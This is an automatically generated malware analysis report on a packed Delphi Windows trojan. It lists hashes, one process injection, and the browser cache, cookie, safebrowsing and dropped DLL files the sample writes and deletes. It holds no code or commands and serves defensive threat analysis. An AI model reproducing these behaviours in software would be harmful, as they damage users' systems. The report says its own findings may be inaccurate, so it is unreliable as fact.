Trojan.Win32.Delphi_06349e57f9

by malwarelabrobot on October 7th, 2017 in Malware Descriptions.

Susp_Dropper (Kaspersky), Trojan.Win32.Delphi.FD, Trojan.Win32.Sasfis.FD, VirTool.Win32.DelfInject.FD, mzpefinder_pcap_file.YR, GenericInjector.YR (Lavasoft MAS)
Behaviour: Trojan, VirTool


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 06349e57f9fa8822f9686a8b25b38d21
SHA1: cd4d388bce555677c56daaae05d5a1678f1aafe1
SHA256: 46d60ad45117a8d849681a4eb96cf1992d44f84bd37a444ce4d032795bd7d71d
SSDeep: 12288:hxRUW380ZKtPEozzQwTRrMTzwuLsBiNVi0JZH6rhfXopP2WVWCvJf6TeI:hxRt7glEoRZMBLSiN0wphpvJCL
Size: 838144 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: PECompactV2X, PECompactv20, UPolyXv05_v6
Company:
Created at: 1992-06-20 01:22:17
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

%original file name%.exe:2748

The Trojan injects its code into the following process(es):

ICZM.exe:1388

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process ICZM.exe:1388 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries (600 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk (2 bytes)
C:\Windows\System32\581eb\CDClient_EX.sys (117 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default (4 bytes)
C:\Users\Public\Desktop\Google Chrome.lnk (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\275130\tAKAXflCv.dll (35264 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\275130\pppHBGDF.tmp (18 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\275130\DAIwGxI.dll (213 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\275130\BqwFFmwC.dll (270 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\275130\4BFD7.txt (155 bytes)
C:\LOG1.txt (1536 bytes)
C:\Users\Public\Desktop\Mozilla Firefox.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\Favorites\Links\Web Slice Gallery.url (290 bytes)
C:\Windows\System32\CDCLOG.txt (428 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\Client[1].dll (81472 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk (1 bytes)
C:\Windows\System32\4BFD7.dat (4 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozstd-track-digest256.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozstd-trackwhite-digest256.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\40ACE2C71721D02751C14CE7231B273A0E58A842 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\7A8D3A9360CC37F0AD80962D4AEA72B6D0F0B2B3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\F1B5C3EDE100D4A38A0A28F1CEF6FAEFB619EC1B (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B4F9F19B69C223FD86BA246F4F451CE4FDC81D36 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\eS-nxtWWJ1LfBWLfd096swuFjH4[1].svg (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\ECE64D1A018F9023721AC8B2F25BD83AEB4E8A8C (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\fc72ORSzwyUu08nYIdyG-ygy8w8[1].svg (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\svg[1].svg (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\jquery.min[1].js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\advert[1].gif (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\78A520FE200DD59F7079043C2E4494D582DB5E27 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\AD7A5673189C3D8259E7B3FE0033E19E1674CC68 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\XJJJSX58.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\E908A39A09178150ACAC85D34DC9551A0D9AE753 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\48555710E97A743C0DD66647CF47BC74B82E981F (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-track-simple.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\1D1FD5C43A3C9601AA6056987017F737DB8ABF7B (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-trackwhite-simple.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozplugin-block-digest256.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\861A7D6C4E285B4DB10DEE7E49FD59A156C5CB40 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\9F92779292CF395AC8E7100B8583605320E370B1 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\FDGZES7U.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\2A45E92D38EFE84CD90EC2FCC468A5D490FCBD7E (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\9 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\8 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\339A4E96E26DFFA4704F0AF081D2B85B12D03939 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\275130\BqwFFmwC.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\O761920L.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\SK6RC4AQ.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\2 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\1 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\0 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\7 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\6 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\5 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\4 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\_yaru.ru[1].js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\DB35F7B5C3B638134575506C1DECC7214B0152E3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000004 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\1CBEA138B025655D4A8BCC260B2DAC0D5EDD72D6 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\4716F9983487F717BEDB4A2344A95133803762E5 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\C (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\B (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\A (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\F (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\E (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\D (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\NWCBOWT9.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\2559C1ED66F9553D151E2FC960388EB1E891B126 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\Client[1].dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\870C1269620CC48AF9164CDC9EA46DA2DC0279C3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\VPSNR0J4.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\41367369B0154D1D2566CC216318C71115E089A2 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\24F9514653FD834D9D33E21B4C0AECB308550A9A (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\8Q2KNK5G.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\desktop.ini (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\983WD333.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\7ZFPBM01.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\GB74HSLE.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\C27D7A62FCB3822B15FE7A889EAC6EBCB8E81A80 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\watch[1].js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\_CACHE_003_ (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-block-simple.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\ACEC3E9837AFFBA2F808D2347310A61110A832A8 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\8D2B634ED057A0D2B7876CD0F9662C750C5AA2E3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\IAU75TW2.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\8WNTYFZE.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\6ACB9987E5D13DDF930A0216112504F72B35A155 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\GF0JZXVN.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\A5VV6NGJ.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozstd-track-digest256.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\156A5CCBEF01C060EFFE6F1F2FE07786A115FBEA (0 bytes)
C:\Windows\System32\581eb\CDClient_EX.sys (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\9D083EF993029DD270F9A810F6083969DA8594D3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\E6BC1B0D7B9F7B812F1C9A7542D07DACD74DF8B7 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\AW5IGQT7.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\35BB6C6081B10CDF7DB50B6EFA374FE53E7BDFF8 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\9fkhsVhseQ-JJcxiLZwCHjhHY[1].svg (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\00CZ9B9Z.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\PMGXNABP.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\9CB1507E8150B6A3A9D726112952A7150EA6236D (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\BPMHTAIlmc5kh6Tymb1I2mmfSAc[1].svg (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\A8D8BCCCDD886569194B60234F0DADDBCE4DF5E6 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\QVWF9XLH.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\SHMEGTHE.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\379IMDJA.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\16F000C509B7DE188B56179BF7EF0DF5B0F613E8 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\832B7A4416790DB08D1CFF514ABE80568EB2A5AC (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\_CACHE_002_ (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\frequencyCap.json (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\28454981111313E6165BC0032AE7D75973DAA649 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B6BE94D0C5013A1F752DB7D7881FD3ED9E40AB2B (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\search[1].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\92127114B1F74C7C0CB98314AB871F3B814368AC (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\929BCF811537CE5A1B05BC367E7D5FCD9D1512C2 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B6D901A89865039CB84FA633FA40EE7DE5D9C921 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\C0F2B5902E53102766C100D0F460054A2443B217 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-block-simple.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\83936E9426867396E4A7F9EFF2AA8303FBC66493 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\FBUBDDF0.txt (0 bytes)
C:\Windows\System32\AdN\ÅäÖÃ.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\C1C89E55A2633162B8F74F19EA5F2E0460A59A97 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\otvet.mail[1].png (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\EA9A23A1084DC6272CC8A2C73BFC178501A1F9C0 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\P2Z07O4S.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-malware-simple.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\D464384ED883D8C895EC6569D49B7CF849603110 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\ZZxR-E_UBI8_1IS7VtDkH_bgw[1].css (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-forbid-simple.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\f[1].txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\18D327979AAFFC5AA7350875BD40E2F9D986FEDF (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\_CACHE_001_ (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\0631DE882B33C8014FE49B456EC2792EEC013072 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\E6F33F9C62B1EEFC86F28D9C75EF92282FCD9C45 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\K4EMAOY7.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\thumbnails (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B2FB183F32D320CA4ACEF3D6214726E37DA08535 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-unwanted-simple.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\0EDDF8C091E2FED62E44BEDDDC1723F5BF38FE4F (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-phish-simple.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-malware-simple.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\OF9L3DR3.txt (0 bytes)
C:\Windows\System32\4BFD7.dat (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozstd-trackwhite-digest256.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\170F54EDBE19BE8676CC69B53BAC08C8932D118A (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\jquery.min[1].js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\svg[1].svg (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\26DCE9685ADD07D49FDFDB35AE2FD824135617AA (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\OfflineCache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\5E4954707B44E5A4B4ACF5F22B52219A1DCA477F (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\52FF99030399F0A45B6C66414333C5B4FCA4216A (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\_yaru.ru[1].js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\509412AB0ECB72A42520795A67ACF843FB0210E3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\ETGRPT21.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-phish-simple.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\996E251B0D179792066F30DEB82476DF9D5E8B15 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\OLCWAOT0.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B0DEFA60F24D21925DA6AE83CB4455379305584A (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\91380939B0A3A08A7837F1BA688B498ED2EC3853 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\8394A0B2D8E569F02DE6B550AF6041770722E67D (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\8694F9E3F9C503551C17EDF4F0F30B83BCDF1DCA (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\D6F079F21194AF40050B050CF0C5B7B7593CB819 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\4CWVLDFS.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-track-simple.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\_search.uk[1].js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-unwanted-simple.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\DA70B9EE949D3ADCBE10033750AB47FFEA045E3E (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-forbid-simple.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-unwanted-simple.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\2031416DA0EBB4347FFB723FC4B4C3289383F1C7 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\F0687D4CB965F097204F417DFBDC74BC5950135F (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\698AC159A6BCBA0D13FE6F10F1A38E498F826F33 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\1C849477DE15B1F8F2245945F3F44468F58146DF (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\E9B5F1423155DB2E35FD739FC2008DB01C93DE1E (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\9C2602C28BD668BB4AE4681731BA564B00BDA3E4 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\AJQLWW1A.txt (0 bytes)
